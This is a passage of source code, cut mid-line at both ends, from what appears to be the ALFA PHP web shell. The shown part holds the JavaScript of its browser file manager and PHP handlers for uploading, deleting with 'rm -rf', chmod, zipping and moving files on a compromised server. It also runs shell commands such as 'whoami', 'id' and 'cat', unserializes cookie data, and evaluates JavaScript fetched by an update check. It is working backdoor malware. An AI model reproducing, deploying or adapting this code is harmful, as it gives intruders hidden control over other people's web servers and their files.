u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm(\'Are You Sure For Delete # "+a+" # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'"+a+"\') : \'\';");break;case"download":s.setAttribute("onclick","g(\'FilesTools\',null,\'"+a+"\', \'download\')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\\/\\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\\/\\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",\'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="\'+l+\'" id="filesman_tab_\'+o+\'" fm_id="\'+o+\'" onclick="filesmanTabController(this);" fname="\'+t+\'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">\'+i+\'</span> <img fm_id="\'+o+\'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>\'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",\'<div style="position:relative;" fm_id="\'+o+\'" id="filesman_holder_\'+o+\'" class="ajaxarea"><div class="header"></div></div>\'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\\{version\\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?\'<span class="header_values" style="margin-left: 4px;">\'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();\r\n</script>\r\n</body>\r\n</html>\r\n<?php\r\n}}\r\nif (!function_exists("posix_getpwuid") && (strpos(@ini_get(\'disable_functions\'), \'posix_getpwuid\')===false)) {\r\nfunction posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos(@ini_get(\'disable_functions\'), \'posix_getgrgid\')===false)) {\r\nfunction posix_getgrgid($p) {return false;} }\r\nfunction alfaWhich($p) {\r\n$path = alfaEx(\'which \' . $p,false,false);\r\nif(!empty($path))\r\nreturn strlen($path);\r\nreturn false;\r\n}\r\nfunction alfaSize($s) {\r\nif($s >= 1073741824)\r\nreturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\nelseif($s >= 1048576)\r\nreturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\nelseif($s >= 1024)\r\nreturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\nelse\r\nreturn $s . \' B\';\r\n}\r\nfunction alfaPerms($p) {\r\nif (($p & 0xC000) == 0xC000)$i = \'s​\';\r\nelseif (($p & 0xA000) == 0xA000)$i = \'l​\';\r\nelseif (($p & 0x8000) == 0x8000)$i = \'-​\';\r\nelseif (($p & 0x6000) == 0x6000)$i = \'b​\';\r\nelseif (($p & 0x4000) == 0x4000)$i = \'d​\';\r\nelseif (($p & 0x2000) == 0x2000)$i = \'c​\';\r\nelseif (($p & 0x1000) == 0x1000)$i = \'p​\';\r\nelse $i = \'u​\';\r\n$i .= (($p & 0x0100) ? \'r​\' : \'-\');\r\n$i .= (($p & 0x0080) ? \'w​\' : \'-\');\r\n$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s​\' : \'x​\' ) : (($p & 0x0800) ? \'S​\' : \'-\'));\r\n$i .= (($p & 0x0020) ? \'r​\' : \'-\');\r\n$i .= (($p & 0x0010) ? \'w​\' : \'-\');\r\n$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s​\' : \'x​\' ) : (($p & 0x0400) ? \'S​\' : \'-\'));\r\n$i .= (($p & 0x0004) ? \'r​\' : \'-\');\r\n$i .= (($p & 0x0002) ? \'w​\' : \'-\');\r\n$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t​\' : \'x​\' ) : (($p & 0x0200) ? \'T​\' : \'-\'));\r\nreturn $i;\r\n}\r\nfunction alfaPermsColor($f,$isbash=false){\r\n$class = "";\r\n$num = "";\r\n$human = "";\r\nif($isbash){\r\n$class = $f["class"];\r\n$num = $f["num"];\r\n$human = $f["human"];\r\n}else{\r\n$num = substr(sprintf(\'%o\', @fileperms($f)),-4);\r\n$human = alfaPerms(@fileperms($f));\r\nif(!@is_readable($f))\r\n$class = "main_red_perm";\r\nelseif (!@is_writable($f))\r\n$class = "main_white_perm";\r\nelse\r\n$class = "main_green_perm";\r\n}\r\nreturn \'<span style="font-weight:unset;" class="\'.$class.\'">\'.$num.\'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="\'.$class.\'">\'.$human.\'</span>\';\r\n}\r\nif(!function_exists("scandir")) {\r\nfunction scandir($dir) {\r\n$dh = opendir($dir);\r\nwhile (false !== ($filename = readdir($dh)))\r\n$files[] = $filename;\r\nreturn $files;\r\n}\r\n}\r\nfunction reArrayFiles($file_post){\r\n$file_ary = array();\r\n$file_count = count($file_post[\'name\']);\r\n$file_keys = array_keys($file_post);\r\nfor ($i=0; $i<$file_count; $i++) {\r\nforeach ($file_keys as $key) {\r\n$file_ary[$i][$key] = $file_post[$key][$i];\r\n}\r\n}\r\nreturn $file_ary;\r\n}\r\nfunction _alfa_can_runCommand($cgi=true,$cache=true){\r\n\tif(isset($_COOKIE["alfa_canruncmd"])&&$cache){\r\n\t\treturn true;\r\n\t}\r\n\tif(strlen(alfaEx("whoami",false,$cgi))>0){\r\n\t\t$_COOKIE["alfa_canruncmd"] = true;\r\n\t\treturn true;\r\n\t}\r\n\treturn false;\r\n}\r\nfunction _alfa_symlink($target, $link){\r\n\t$phpsym = function_exists("symlink");\r\n\tif($phpsym){\r\n\t\t@symlink($target, $link);\r\n\t}else{\r\n\t\talfaEx("ln -s \'".addslashes($target)."\' \'".addslashes($link)."\'");\r\n\t}\r\n}\r\nfunction _alfa_file_exists($file,$cgi=true){\r\n\tif(@file_exists($file)){\r\n\t\treturn true;\r\n\t}else{\r\n\t\tif(strlen(alfaEx("ls -la \'".addslashes($file)."\'",false,$cgi))>0){\r\n\t\t\treturn true;\r\n\t\t}\r\n\t}\r\n\treturn false;\r\n}\r\nfunction _alfa_file($file,$cgi=true){\r\n\t$array = @file($file);\r\n\tif(!$array){\r\n\t\tif(strlen(alfaEx("id",false,$cgi))>0){\r\n\t\t\t$data = alfaEx(\'cat "\'.addslashes($file).\'"\',false,$cgi);\r\n\t\t\tif(strlen($data)>0){\r\n\t\t\t\treturn explode("\\n", $data);\r\n\t\t\t}else{\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}else{\r\n\t\treturn $array;\r\n\t}\r\n}\r\nfunction _alfa_is_writable($file){\r\n\t$check = false;\r\n\t$check = @is_writable($file);\r\n\tif(!$check){\r\n\t\tif(_alfa_can_runCommand()){\r\n\t\t\t$check = alfaEx(\'[ -w "\'.trim(addslashes($file)).\'" ] && echo "yes" || echo "no"\');\r\n\t\t\tif($check == "yes"){\r\n\t\t\t\t$check = true;\r\n\t\t\t}else{\r\n\t\t\t\t$check = false;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $check;\r\n}\r\nfunction _alfa_is_dir($dir,$mode="-d"){\r\n\t$check = false;\r\n\t$check = @is_dir($dir);\r\n\tif($mode == "-e"){\r\n\t\t$check = @is_file($dir);\r\n\t}\r\n\tif(!$check){\r\n\t\tif(_alfa_can_runCommand()){\r\n\t\t\t$check = alfaEx(\'[ "\'.trim($mode).\'" "\'.trim(addslashes($dir)).\'" ] && echo "yes" || echo "no"\');\r\n\t\t\tif($check == "yes"){\r\n\t\t\t\treturn true;\r\n\t\t\t}else{\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $check;\r\n}\r\nfunction _alfa_load_ace_options($base){\r\n\treturn \'<span>Theme: </span><select class="ace-controler ace-theme-selector" base="\'.$base.\'" onChange="alfaAceChangeSetting(this,\\\'theme\\\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="\'.$base.\'" onChange="alfaAceChangeSetting(this,\\\'lang\\\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\\\'\'.$base.\'\\\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\\\'\'.$base.\'\\\',\\\'+\\\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\\\'\'.$base.\'\\\', \\\'-\\\', this);return false;">-</button> | \';\r\n}\r\nfunction alfaFilesMan2(){\r\n\talfahead();\r\n\tAlfaNum(8,9,10,7,6,5,4);\r\n\techo \'<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>\';\r\n\talfaFooter();\r\n}\r\nfunction copy_paste($c,$s,$d){\r\nif(@is_dir($c.$s)){\r\n@mkdir($d.$s);\r\n$h = @opendir($c.$s);\r\nwhile (($f = @readdir($h)) !== false)\r\nif (($f != ".") and ($f != ".."))\r\ncopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n} elseif(is_file($c.$s))\r\n@copy($c.$s, $d.$s);\r\n}\r\nfunction alfaFilesMan(){\r\nif(!empty ($_COOKIE[\'alfa_f\']))\r\n$_COOKIE[\'alfa_f\'] = @unserialize($_COOKIE[\'alfa_f\']);\r\nif(!empty($_POST[\'alfa1\'])){\r\nswitch($_POST[\'alfa1\']){\r\ncase \'uploadFile\':\r\n$move_cmd_file = false;\r\n$alfa_canruncmd = false;\r\nif($GLOBALS[\'glob_chdir_false\']){\r\n\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\n\t$move_cmd_file = true;\r\n}\r\nif(_alfa_is_writable($GLOBALS[\'cwd\'])){\r\n$files = reArrayFiles($_FILES[\'f\']);\r\n$ret_files = array();\r\nforeach($files as $file){\r\nif($move_cmd_file&&$alfa_canruncmd){\r\n\talfaEx("cat \'".addslashes($file[\'tmp_name\'])."\' > \'".addslashes($_POST["c"]."/".$file[\'name\'])."\'");\r\n}else{\r\n\tif(@move_uploaded_file($file[\'tmp_name\'],$file[\'name\'])){\r\n\t\t$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file[\'name\'])):array("name" => "????");\r\n\t\t$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file[\'name\'])):array("name" => "????");\r\n\t\t$file_owner = $ow[\'name\']?$ow[\'name\']:(function_exists("fileowner")?@fileowner($file[\'name\']):"????");\r\n\t\t$file_group = $gr[\'name\']?$gr[\'name\']:(function_exists("filegroup")?@filegroup($file[\'name\']):"????");\r\n\t\t$file_modify = @date(\'Y-m-d H:i:s\', @filemtime($file[\'name\']));\r\n\t\t$file_perm = alfaPermsColor($file[\'name\']);\r\n\t\t$file_size = @filesize($file[\'name\']);\r\n\t\t$ret_files[] = array("name" => $file[\'name\'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);\r\n\t}\r\n}\r\n}\r\nif(!$move_cmd_file){\r\n\techo json_encode($ret_files);\r\n}\r\n}else{\r\n\techo "noperm";\r\n\treturn;\r\n}\r\nif(!$move_cmd_file){\r\nreturn;\r\n}\r\nbreak;\r\ncase \'mkdir\':\r\n$new_dir_cmd = false;\r\nif($GLOBALS[\'glob_chdir_false\']){\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\tif(_alfa_is_writable($GLOBALS[\'cwd\'])){\r\n\t\t\tif(!_alfa_is_dir(trim($_POST[\'alfa2\']))){\r\n\t\t\t\talfaEx("cd \'".trim(addslashes($_POST[\'c\']))."\';mkdir \'".trim(addslashes($_POST[\'alfa2\']))."\'");\r\n\t\t\t\techo "<script>alfaShowNotification(\'".addslashes($_POST[\'alfa2\'])." created...\', \'Files manager\');</script>";\r\n\t\t\t}else{\r\n\t\t\t\techo "<script>alfaShowNotification(\'folder already existed\', \'Files manager\', \'error\');</script>";\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\techo "<script>alfaShowNotification(\'folder isnt writable !\', \'Files manager\', \'error\');</script>";\r\n\t\t}\r\n\t}else{\r\n\t\techo "<script>alfaShowNotification(\'Can\\\'t create new dir !\', \'Files manager\', \'error\');</script>";\r\n\t}\r\n}else{\r\n\tif(_alfa_is_writable($GLOBALS[\'cwd\'])){\r\n\t\tif(!_alfa_is_dir(trim($_POST[\'alfa2\']))){\r\n\t\t\tif(!@mkdir(trim($_POST[\'alfa2\']))){\r\n\t\t\t\techo "<script>alfaShowNotification(\'Can\\\'t create new dir !\', \'Files manager\', \'error\');</script>";\r\n\t\t\t}else{\r\n\t\t\t\techo "<script>alfaShowNotification(\'".addslashes($_POST[\'alfa2\'])." created...\', \'Files manager\');</script>";\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\techo "<script>alfaShowNotification(\'folder already existed\', \'Files manager\', \'error\');</script>";\r\n\t\t}\r\n\t}else{\r\n\t\techo "<script>alfaShowNotification(\'folder isnt writable !\', \'Files manager\', \'error\');</script>";\r\n\t}\r\n}\r\nbreak;\r\ncase \'delete\':\r\nfunction deleteDir($path){\r\n$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n$dh = @opendir($path);\r\nwhile(($item = @readdir($dh)) !== false){\r\n$item = $path.$item;\r\nif((basename($item) == "..") || (basename($item) == "."))\r\ncontinue;\r\n$type = @filetype($item);\r\nif ($type == "dir")\r\ndeleteDir($item);\r\nelse\r\n@unlink($item);\r\n}\r\n@closedir($dh);\r\n@rmdir($path);\r\n}\r\nif(is_array(@$_POST[\'f\']))\r\nforeach($_POST[\'f\'] as $f){\r\nif($f == \'..\')\r\ncontinue;\r\n$f = rawurldecode($f);\r\nif($GLOBALS["glob_chdir_false"]){\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\talfaEx("rm -rf \'".addslashes($_POST[\'c\'].\'/\'.$f)."\'");\r\n\t}\r\n}else{\r\nalfaEx("rm -rf \'".addslashes($f)."\'",false,false);\r\nif(@is_dir($f))\r\ndeleteDir($f);\r\nelse\r\n@unlink($f);\r\n}\r\n}\r\nif(@is_dir(rawurldecode(@$_POST[\'alfa2\']))&&rawurldecode(@$_POST[\'alfa2\'])!=\'..\'){\r\ndeleteDir(rawurldecode(@$_POST[\'alfa2\']));\r\nalfaEx("rm -rf \'".addslashes($_POST[\'alfa2\'])."\'",false,false);\r\n}else{\r\n@unlink(rawurldecode(@$_POST[\'alfa2\']));\r\n}\r\nif($GLOBALS["glob_chdir_false"]){\r\n\t$source = rawurldecode(@$_POST[\'alfa2\']);\r\n\tif($source!=\'..\'&&!empty($source)){\r\n\t\tif(_alfa_can_runCommand(true,true)){\r\n\t\t\talfaEx("cd \'".trim(addslashes($_POST[\'c\']))."\';rm -rf \'".addslashes($source)."\'");\r\n\t\t}\r\n\t}\r\n}\r\nif(is_array($_POST[\'f\']))\r\nreturn;\r\nbreak;\r\ncase \'paste\':\r\nif($_COOKIE[\'alfa_act\'] == \'copy\'&&isset($_COOKIE[\'alfa_f\'])){\r\nforeach($_COOKIE[\'alfa_f\'] as $f)\r\ncopy_paste($_COOKIE[\'alfa_c\'],$f, $GLOBALS[\'cwd\']);\r\n}elseif($_COOKIE[\'alfa_act\'] == \'move\'&&isset($_COOKIE[\'alfa_f\'])){\r\nfunction move_paste($c,$s,$d){\r\nif(@is_dir($c.$s)){\r\n@mkdir($d.$s);\r\n$h = @opendir($c.$s);\r\nwhile (($f = @readdir($h)) !== false)\r\nif(($f != ".") and ($f != ".."))\r\ncopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n}elseif(@is_file($c.$s))\r\n@copy($c.$s, $d.$s);\r\n}\r\nforeach($_COOKIE[\'alfa_f\'] as $f)\r\n@rename($_COOKIE[\'alfa_c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n}elseif($_COOKIE[\'alfa_act\'] == \'zip\'&&isset($_COOKIE[\'alfa_f\'])){\r\nif(class_exists(\'ZipArchive\')){\r\n$zip = new ZipArchive();\r\n$zipX = "alfa_".rand(1,1000).".zip";\r\nif($zip->open($zipX, 1)){\r\n@chdir($_COOKIE[\'alfa_c\']);\r\nforeach($_COOKIE[\'alfa_f\'] as $f){\r\nif($f == \'..\')continue;\r\nif(@is_file($_COOKIE[\'alfa_c\'].$f))\r\n$zip->addFile($_COOKIE[\'alfa_c\'].$f, $f);\r\nelseif(@is_dir($_COOKIE[\'alfa_c\'].$f)){\r\n$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));\r\nforeach($iterator as $key=>$value){\r\n$key = str_replace(\'\\\\\',\'/\',realpath($key));\r\nif(@is_dir($key)){\r\nif(in_array(substr($key, strrpos($key,\'/\')+1),array(\'.\', \'..\')))continue;\r\n}else{$zip->addFile($key,$key);}}}}\r\n@chdir($GLOBALS[\'cwd\']);\r\n$zip->close();\r\n__alert(\'>> \'.$zipX.\' << is created...\');}}\r\n}elseif($_COOKIE[\'alfa_act\'] == \'unzip\'&&isset($_COOKIE[\'alfa_f\'])){\r\nif(class_exists(\'ZipArchive\')){\r\n$zip = new ZipArchive();\r\nforeach($_COOKIE[\'alfa_f\'] as $f) {\r\nif($zip->open($_COOKIE[\'alfa_c\'].$f)){\r\n$zip->extractTo($_COOKIE[\'alfa_cwd\']);\r\n$zip->close();}}}}\r\nunset($_COOKIE[\'alfa_f\']);\r\nbreak;\r\ndefault:\r\nif(!empty($_POST[\'alfa1\'])){\r\nif(in_array($_POST[\'alfa1\'], array("copy", "move", "zip", "unzip"))){\r\n__alfa_set_cookie(\'alfa_act\', @$_POST[\'alfa1\']);\r\n__alfa_set_cookie(\'alfa_f\', @serialize($_POST[\'f\']));\r\n__alfa_set_cookie(\'alfa_c\', @$_POST[\'c\']);\r\nreturn;\r\n}\r\n}\r\nbreak;\r\n}\r\n}\r\n$dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\nif(preg_match("#(.*)\\/\\.\\.#", $_POST[\'c\'], $res)){\r\n\t$path = explode(\'/\', $res[1]);\r\n\tarray_pop($path);\r\n\t$_POST[\'c\'] = implode(\'/\', $path);\r\n}\r\n$cmd_dir = false;\r\nif($dirContent === false){\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\t$tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];\r\n\t\t@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));\r\n\t\tif(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){\r\n\t\t\t$bash = 